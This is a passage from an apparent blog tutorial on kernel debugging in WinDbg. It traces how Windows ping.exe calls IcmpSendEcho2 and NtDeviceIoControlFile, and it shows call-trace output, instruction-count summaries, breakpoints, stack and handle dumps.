2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 8 0 [ 3] ntdll!RtlLeaveCriticalSection</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 2 8 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 3] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 3] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 3] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 3] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 2 4 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 2 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 9 0 [ 3] ntdll!_SEH_epilog</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 9 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 23 321 [ 1] kernel32!LocalAlloc</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 10 0 [ 2] kernel32!_SEH_epilog</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 100 354 [ 0] iphlpapi!IcmpSendEcho2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 56 0 [ 1] kernel32!_SEH_epilog</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 1] ntdll!ZwCreateEvent</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 2 0 [ 2] ntdll!KiFastSystemCall</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!ZwCreateEvent</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> >> Unable to match return to kernel32!_SEH_epilog</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 40 3 [ 1] ntdll!ZwCreateEvent</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> >> Unable to match return to iphlpapi!IcmpSendEcho2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 0] ntdll!NtDeviceIoControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 2 0 [ 1] ntdll!KiFastSystemCall</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 1] ntdll!NtDeviceIoControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> >> Unable to match return to iphlpapi!IcmpSendEcho2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 13 3 [ 0] ntdll!NtDeviceIoControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] kernel32!_SEH_epilog</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!ZwCreateEvent</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> >> Unable to match return to ntdll!KiFastSystemCall</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 18 0 [ 0] ntdll!NtDeviceIoControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 1] ntdll!NtWaitForSingleObject</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 2 0 [ 2] ping!IcmpSendEcho2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!NtWaitForSingleObject</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 24 6 [ 0] ntdll!NtDeviceIoControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> >> Unable to match return to ntdll!KiFastSystemCall</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 16 0 [ 0] ntdll!NtClose</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 8 0 [ 1] iphlpapi!Icmp6CreateFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 22 8 [ 0] ntdll!NtClose</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> >> Unable to match return to ntdll!KiFastSystemCall</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 0] ntdll!NtDeviceIoControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 19 0 [ 1] ntdll!RtlSetLastWin32Error</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 11 19 [ 0] ntdll!NtDeviceIoControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 1] ntdll!RtlFreeHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 19 0 [ 2] 0x00000000</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 39 19 [ 1] ntdll!RtlFreeHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 4 0 [ 1] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> >> Unable to match return to ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 38 81 [ 0] ntdll!NtDeviceIoControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 11 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> >> Unable to match return to ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlpUpdateIndexInsertBlock</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 44 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 17 0 [ 1] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> >> Unable to match return to ping!IcmpSendEcho2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 114 17 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 19 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> >> Unable to match return to ping!IcmpSendEcho2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 8 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> >> Unable to match return to ping!IcmpSendEcho2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 9 0 [ 1] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 2 9 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> >> Unable to match return to ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 6 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 960 instructions were executed in 236 events (0 from other threads)</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> </span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> Function Name Invocations MinInst MaxInst AvgInst</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0x00000000 1 19 19 19</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> iphlpapi!Icmp6CreateFile 1 8 8 8</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> iphlpapi!IcmpSendEcho2 1 100 100 100</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> kernel32!LocalAlloc 1 23 23 23</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> kernel32!_SEH_epilog 3 1 56 22</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> kernel32!_SEH_prolog 1 19 19 19</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ntdll!KiFastSystemCall 2 2 2 2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ntdll!NtClose 1 22 22 22</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="color: #38761d;">ntdll!NtDeviceIoControlFile 4 1 38 19 </span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ntdll!NtWaitForSingleObject 2 1 3 2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ntdll!RtlAllocateHeap 202 1 114 2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ntdll!RtlEnterCriticalSection 1 11 11 11</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ntdll!RtlFreeHeap 1 39 39 39</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ntdll!RtlLeaveCriticalSection 1 8 8 8</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ntdll!RtlSetLastWin32Error 1 19 19 19</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ntdll!RtlpUpdateIndexInsertBlock 2 1 19 10</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ntdll!RtlpUpdateIndexRemoveBlock 1 17 17 17</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ntdll!ZwCreateEvent 3 1 40 14</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ntdll!_SEH_epilog 1 9 9 9</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ntdll!_SEH_prolog 1 19 19 19</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ping!IcmpSendEcho2 2 1 2 1</span></span></blockquote><ul><li>From the summary, this function <b>NtDeviceIoControlFile </b>was called. We know that <b>ping</b> sends the user data/buffer (packets request) to the kernel via this function. We set the breakpoint at the function and look for the parameters that it passes to the kernel: </li>
</ul><blockquote><span style="font-size: x-small;"><span style="color: yellow; font-family: "Courier New",Courier,monospace;">kd> bp ntdll!NtDeviceIoControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> </span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> kd> bl</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0 d 76d6b73c 0001 (0001) iphlpapi!IcmpSendEcho2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 e 01002376 0001 (0001) ping!main+0x9ad</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 2 e 7c90d8e3 0001 (0001) ntdll!NtDeviceIoControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> Breakpoint 2 hit</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ntdll!NtDeviceIoControlFile:</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 001b:7c90d8e3 b842000000 mov eax,42h</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> kd> kb</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ChildEBP RetAddr Args to Child </span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0007f9ac 76d6b8c4 0000074c 00000744 00000000 ntdll!NtDeviceIoControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> WARNING: Stack unwind information not available. Following frames may be wrong.</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0007f9f8 0100237b 0000074c 00000000 00000000 iphlpapi!IcmpSendEcho2+0x188</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0007ff44 010029eb 00000003 00034020 00032a98 ping!main+0x9b2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0007ffc0 7c816fd7 00000010 00000000 7ffd4000 ping!mainCRTStartup+0x125</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0007fff0 00000000 010028c6 00000000 78746341 kernel32!BaseProcessStart+0x23</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> </span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> kd> !handle 0000074c </span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> processor number 0, process 817f1428</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> PROCESS 817f1428 SessionId: 0 Cid: 00ac Peb: 7ffd4000 ParentCid: 077c</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> DirBase: 085c0260 ObjectTable: e1b31c88 HandleCount: 47.</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> Image: ping.exe</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> Handle table at e1157000 with 47 Entries in use</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 074c: Object: 81779bb0 GrantedAccess: 001200a0 Entry: e1157e98</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> Object: 81779bb0 Type: (819b8560) File</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ObjectHeader: 81779b98 (old version)</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> HandleCount: 1 PointerCount: 1</span></span> </blockquote><ul><li>Observe the stack:</li>
</ul><blockquote style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">kd> dd esp lb<br />
0007f9b0 76d6b8c4 0000074c 00000744 00000000<br />
0007f9c0 00000000 000a4720 00120000 000a4bf0<br />
0007f9d0 00001ff8 000a2730 00001ff0</span></blockquote> <br />
<blockquote> <span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;"> </span><span style="color: yellow; font-family: "Courier New",Courier,monospace;">Retn Addr: 76d6b8c4</span></span><br />
